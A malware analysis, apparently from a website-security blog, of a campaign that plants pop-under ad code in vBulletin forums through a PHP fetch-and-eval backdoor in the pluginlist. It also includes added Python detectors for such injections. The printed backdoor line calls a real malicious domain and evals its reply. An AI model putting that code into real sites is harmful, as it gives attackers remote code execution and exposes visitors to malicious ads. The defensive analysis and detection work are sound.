Vbulletin Used to Show Malicious Advertisements

In the past, we have seen a massive number of vBulletin websites compromised through the VBSEO vulnerability. Attackers have been infecting vBulletin websites with this malware since 2012, and more recently with a new variation of the same infection. Since that development, the datastore table in vBulletin has been a prime location for attackers to store malicious code, where it is loaded on every visit.

Recently, we came across a malware campaign in which vBulletin websites showed malicious ads from popads[.]net for no apparent reason. The webmasters had no idea where the ads were coming from.

[Figure: Pop-up Ads on vBulletin Forums]

This ad network is well known for nasty pop-ups and malware-spreading advertisements as the core part of its network, which makes this a troublesome situation.

Here’s an example of the code being injected into the vBulletin sites:

<!-- PopAds.net Popunder Code for www.YourSite.com -->
<script type="text/javascript" data-cfasync="false">
var _pop = _pop || [];
_pop.push(['siteId', 1514372]);
_pop.push(['minBid', 0]);
_pop.push(['popundersPerIP', 0]);
_pop.push(['delayBetween', 0]);
_pop.push(['default', false]);
_pop.push(['defaultPerDay', 0]);
_pop.push(['topmostLayer', false]);
(function() {
var pa = document.createElement('script'); pa.type = 'text/javascript'; pa.async = true;
var s = document.getElementsByTagName('script')[0];
pa.src = '//c1.popads.net/pop.js';
pa.onerror = function() {
var sa = document.createElement('script'); sa.type = 'text/javascript'; sa.async = true;
sa.src = '//c2.popads.net/pop.js';
s.parentNode.insertBefore(sa, s);
};
s.parentNode.insertBefore(pa, s);
})();
</script>
<!-- PopAds.net Popunder Code End -->

The code is quite easy to spot because it is placed after the closing </html> tag. Most website security scanners would flag it as suspicious, and, strangely enough, it is only displayed once per IP address: a repeat visitor would not see the ads on subsequent visits.
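As an added check (not code from the original post), the placement after </html> can be tested mechanically: this Python function lists the external script hosts that appear after the closing tag, covering both a direct script src and the inline loader style used by the injected snippet. The sample page and the adnetwork.invalid hosts are constructed for the example.

```python
import re

CLOSE_TAG = "</html>"

def trailing_script_hosts(html: str) -> list:
    """Hostnames of external scripts that sit after the closing </html> tag.

    Nothing legitimate belongs after </html>, so any external host found there
    is worth a look. Two loader styles are covered: a direct <script src=...>
    and the inline pattern from the injected snippet (pa.src = '//host/...')."""
    idx = html.lower().rfind(CLOSE_TAG)
    if idx < 0:
        return []
    tail = html[idx + len(CLOSE_TAG):]
    host = r"""['"](?:https?:)?//([^/'"\s]+)"""
    hosts = set()
    for pattern in (r"<script[^>]*\bsrc\s*=\s*" + host, r"\.src\s*=\s*" + host):
        for m in re.finditer(pattern, tail, re.I):
            hosts.add(m.group(1).lower())
    return sorted(hosts)

# Constructed sample page: a normal document followed by an injected popunder
# loader after </html>, with the script hosts replaced by placeholders.
SAMPLE_PAGE = """<html><head><script src="/clientscript/vbulletin.js"></script></head>
<body><p>forum content</p></body></html>
<!-- PopAds.net Popunder Code for www.YourSite.com -->
<script type="text/javascript">
(function() {
var pa = document.createElement('script'); pa.async = true;
var s = document.getElementsByTagName('script')[0];
pa.src = '//c1.adnetwork.invalid/pop.js';
pa.onerror = function() {
var sa = document.createElement('script');
sa.src = '//c2.adnetwork.invalid/pop.js';
s.parentNode.insertBefore(sa, s);
};
s.parentNode.insertBefore(pa, s);
})();
</script>
"""

if __name__ == "__main__":
    print(trailing_script_hosts(SAMPLE_PAGE))
```

Because the campaign serves the injection only once per IP, run the check against a copy of the page fetched from an address the site has not seen before.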

External PHP File Loading in Pluginlist

Knowing that vBulletin infections tend to store themselves inside the datastore table, we took a look at that table, more specifically at the pluginlist row.

We found something that shouldn't be there in the middle of the Tapatalk code:

$output = preg_replace('@<link href="([^">]+)android-app:\/\/com.quoord\.tapatalkpro\.activity\/[email protected]',
'<link href="android-app://com.quoord.tapatalkpro.activity/tapatalk', $output);
$output = preg_replace('@<link href="([^">]+)ios-app:\/\/307880732\/[email protected]',
'<link href="ios-app://307880732/tapatalk', $output);
$config_data = file_get_contents('http://geekube(.)com/wp-content/uploads/2013/xml.php?a=inner&host=' . $_SERVER['SERVER_NAME']);
if(strlen($config_data) > 0){ eval($config_data); }
";s:14:"page_templates";s:106:"global $vbulletin;

Loading PHP files from external sources through the pluginlist is never a good thing, so it deserved further investigation. We simply mimicked the requests in question.
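An added example, not code from the original post: a Python scanner for the pluginlist row that parses vBulletin's PHP-serialised hook array (the s:14:"page_templates" shape visible in the excerpt above) and flags any hook containing the remote fetch, eval, or SERVER_NAME use found in the injection. The sample row and the malware.example.invalid domain are constructed for the example.

```python
import re

# Hallmarks of the injection found in the pluginlist row: a remote fetch, an
# eval of whatever came back, and use of the victim's hostname.
SUSPICIOUS = {
    "remote_fetch": re.compile(r"file_get_contents\(\s*['\"]https?://", re.I),
    "eval": re.compile(r"\beval\s*\("),
    "server_name": re.compile(r"\$_SERVER\[['\"]SERVER_NAME['\"]\]"),
}

def serialize_pluginlist(plugins: dict) -> bytes:
    """Build a PHP-serialised string->string array, the shape vBulletin stores."""
    out = b"a:%d:{" % len(plugins)
    for hook, code in plugins.items():
        for s in (hook.encode(), code.encode()):
            out += b's:%d:"%s";' % (len(s), s)
    return out + b"}"

def parse_pluginlist(blob: bytes) -> dict:
    """Inverse of serialize_pluginlist for a flat a:N:{s:L:"k";s:L:"v";...} array.
    Lengths are byte counts, so slice by them instead of regexing through code."""
    m = re.match(rb"a:(\d+):\{", blob)
    if not m:
        raise ValueError("not a serialised PHP array")
    pos, items = m.end(), []
    for _ in range(2 * int(m.group(1))):
        sm = re.compile(rb's:(\d+):"').match(blob, pos)
        if not sm:
            raise ValueError("bad token at offset %d" % pos)
        start, length = sm.end(), int(sm.group(1))
        items.append(blob[start:start + length].decode("utf-8", "replace"))
        pos = start + length + 2  # skip the closing '";'
    return dict(zip(items[0::2], items[1::2]))

def scan_pluginlist(blob: bytes) -> list:
    """[(hook_name, [matched_rule, ...]), ...] for hooks that look injected."""
    findings = []
    for hook, code in parse_pluginlist(blob).items():
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(code)]
        if hits:
            findings.append((hook, hits))
    return findings

# Constructed sample row: the Tapatalk hook with the injected fetch-and-eval
# (placeholder domain, not the campaign's), plus a clean hook.
SAMPLE_BLOB = serialize_pluginlist({
    "global_complete": "$output = preg_replace('@tapatalk@', 'tapatalk', $output);\n"
        "$config_data = file_get_contents('http://malware.example.invalid/xml.php?a=inner&host='"
        " . $_SERVER['SERVER_NAME']);\nif(strlen($config_data) > 0){ eval($config_data); }",
    "page_templates": "global $vbulletin;",
})
```

Run scan_pluginlist over the raw data column of the pluginlist row pulled from the datastore table; a clean install returns an empty list.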

At the first level of the request chain, the geekube(.)com domain returns the following PHP, hosted on a malicious WordPress site:

$output .= file_get_contents('http://geekube.com/wp-content/uploads/2013/uploads/sites/16b54149eeb067699ab60ce79aa44b9e/js.php?remote=' . $_SERVER['REMOTE_ADDR']);

We can see that the external script receives the visitor’s IP
address, which allows the malware to perform its conditional IP controls
and make detection harder. It also means we can easily spoof the
requests with a new IP to get to the next step.

By setting $_SERVER['REMOTE_ADDR'] to a server IP, for example 192.192.192.192, the next script immediately returns the entire block of popads advertisement code we saw initially.

The first part of the request chain makes use of $_SERVER['SERVER_NAME'], and now we can see why: the script customizes the code to make it look as legitimate as possible by modifying the initial comment line:
<!-- PopAds.net Popunder Code for www.YourSite.com -->

The script will display the victim’s website domain in the comment line instead of www.YourSite.com
in an attempt to fool webmasters into mistaking it for legitimate code.

New Domains Being Used

A new domain involved in this campaign, images(.)imagenetcom(.)com, uses the exact same mechanisms and requests.

We suspect there will be other sites that also leverage this tactic against vBulletin sites.

It's always important to keep an eye on the plugins you have on your website. This is especially important in vBulletin because of the ease with which attackers can add custom code or calls to external scripts to already existing plugins. This alone makes it difficult for a webmaster to locate the malicious injection, unless the plugins in use are reviewed constantly.

Integrity monitoring services will also help you stay aware of any unauthorized modifications to plugins and files on your site.

If you suspect your website has been infected, we are always ready to assist you.
